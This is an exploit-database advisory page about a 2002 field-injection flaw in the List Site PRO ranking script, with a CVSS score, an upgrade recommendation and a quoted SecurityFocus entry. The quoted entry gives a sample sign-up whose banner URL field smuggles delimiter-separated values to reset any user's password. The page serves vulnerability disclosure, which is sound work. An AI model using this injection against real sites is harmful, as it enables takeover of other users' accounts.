header-logo
Suggest Exploit
vendor:
List Site PRO
by:
SecurityFocus
8.8
CVSS
HIGH
List Site PRO Arbitrary Value Injection
20
CWE
Product Name: List Site PRO
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

List Site PRO Arbitrary Value Injection

List Site PRO is a top site ranking system that counts hits from member sites and then ranks them according to the number of hits. A vulnerability exists in List Site PRO that allows an attacker to inject arbitrary values via HTML input form fields into the underlying flat-file database used by List Site PRO. By signing up with a specially crafted banner URL, an attacker can reset the password of any user account to a known value.

Mitigation:

Upgrade to the latest version of List Site PRO.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6685/info

List Site PRO is a top site ranking system that counts hits from member sites and then ranks them according to the number of hits.

A problem has been reported for List Site PRO that would allow an attacker to inject arbitrary values via html input form fields into the underlying flat-file database used by List Site PRO.

A malicious user could sign up like this:

username:username
email:email@emial.com
url:www.url.com
bannerurl:www.site.com/banner.gif ||password|%User_ID%|60|468
banner height:68
banner width:460
password:pass

To reset the sites,specified by %User_ID%,password to 'password'.

Navigation

Suggest Exploit

Services By CQR